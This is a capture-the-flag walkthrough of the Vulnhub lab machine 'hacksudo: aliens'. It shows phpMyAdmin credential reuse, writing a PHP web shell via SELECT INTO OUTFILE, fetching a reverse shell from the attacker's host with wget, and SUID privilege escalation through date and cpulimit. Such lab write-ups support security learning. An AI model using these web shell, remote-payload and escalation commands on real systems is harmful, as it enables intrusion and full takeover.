Vulnhub Walkthrough: hacksudo: aliens
Download Link: https://download.vulnhub.com/hacksudo/HacksudoAliens.zip
Author: billythegoat-1
Difficulty: easy..ish
Designer: Vishal Waghmare
👽 Estimados lectores, welcome! In this walkthrough, we’ll dive into the Aliens vulnerable machine by Hacksudo. This is my 4th write-up on a Hacksudo machine (maybe it’s time to try something new😅), but there’s something I love about the Hacksudo series — it’s perfect for beginners like me to grasp different vulnerability concepts easily.
Without further ado, let’s jump into the machine and start cracking! 🎯 Enjoy the journey! …Lessgoo!! 🚀🔥👾
Step 1: Information gathering
Let’s kick off by scanning our internal network to get the target ip using netdiscover.
netdiscover -r 192.168.4.0/24
ip address: 192.168.4.32
I went on and fired up nmap and gobuster to see what ports are open, and possible directories listing.
nmap -sC -sV 192.168.4.32
As you can see we have to http ports open. 80 and 9000. Let’s start with directory listing on port 80 and see if there is anything interesting there.
gobuster dir -u http://192.168.4.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
Let’s examine the page’s source code to check for any comments that might contain hidden information. Nothing there. Except a fun game in the /game.html directory.
However, an interesting file is in the http://192.168.4.32/backup/ directory
Cat that out and you get some credentials
user=”vishal”
password=”hacksudo”
These credentials will hopefully be of help after on.
Getting on with the enumeration of the port 9000 with gobuster
We get a phpadmin login page
Step 2: Foothold
Using the credentials early on, we are able to login as vishal.
I did some research on how to get a shell from The phpmyAdmin and stumbled upon this article.
Step3: Gaining Access
Using the following command:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/cmd.php'This code basically puts a minimalist command prompt into a file called cmd.php in the /var/www/html/ directory.
Now, we head to port 80 and execute pwd to see if the cmd is working
192.168.4.32/cmd.php?cmd=pwd
Seems like it is working fine. Let’s try and get a persistent php reverse shell.
I used the pentestmonkey php reverse shell for this machine. Creating a php file and pasting in the code. I then fired up a quick and simple python server to host the reverse shell(shell.php).
python -m http.server 80The command to get the reverse shell would be:
192.168.4.32/cmd.php?cmd=wget 192.168.4.3/shell.phpBut first, we must encode “wget 192.168.4.3/shell.php” into a url form using online url encoding.
192.168.4.32/cmd.php?cmd=wget%20192.168.4.3%2Fshell.phpAfter downloading the shell.php file, we now run our netcat listener:
nc -lvnp 9001And fire up the shell.php by :
192.168.4.32/shell.php
I immediately set the environment after getting a shell using:
python -c 'import pty; pty.spawn("/bin/bash")'export TERM=xtermI try to see if there is any binaries with the SUID bit set using
find / -perm -4000 -type f 2>/dev/null
At the end of the listing, we see an unsual binary. date
After checking on gtfobins, date can be used to escalate privilegies using:
LFILE=file_to_read
./date -f $LFILEI prefered putting it in a script and run it from there
run ./elevate.sh
Step 3: Privilege Escalation 1
We can see the user hacksudo’s hashed password. Let’s use hashcat to crack using the following command:
hashcat -m 1800 -a 0 hash.txt rockyou.txtwe get the following password: aliens
Let’s ssh into the machine to get access to a convenient shell.
We get our user flag in the Desktop in the /home/hacksudo/Desktop/ directory
We, after, try to see if there is any binaries with SUID set that the user hacksudo has access to.
At the very top, we observe the cpulimit binary. A quick look at gtfobins and we get our exploit.
./cpulimit -l 100 -f -- /bin/sh -pThe binary happens to be in the /Download directory.
Step 4: Privilege Escalation 2
Using our exploit from the gtfobins, we get our root shell.
Conclusion:
🎉 And there you have it, dear readers! Another banger from the Vishal Waghmare . This machine was a real standout for me, as it was my first time exploiting a vulnerability through phpMyAdmin — a great learning experience! Once I leveraged the phpMyAdmin vulnerability to gain shell access, the rest was relatively straightforward, with familiar SUID binaries to explore.
Thank you for following along on this journey! I hope you enjoyed it as much as I did. Stay tuned for the next walkthrough — I’ll see you there! Cheers! 🍻💻
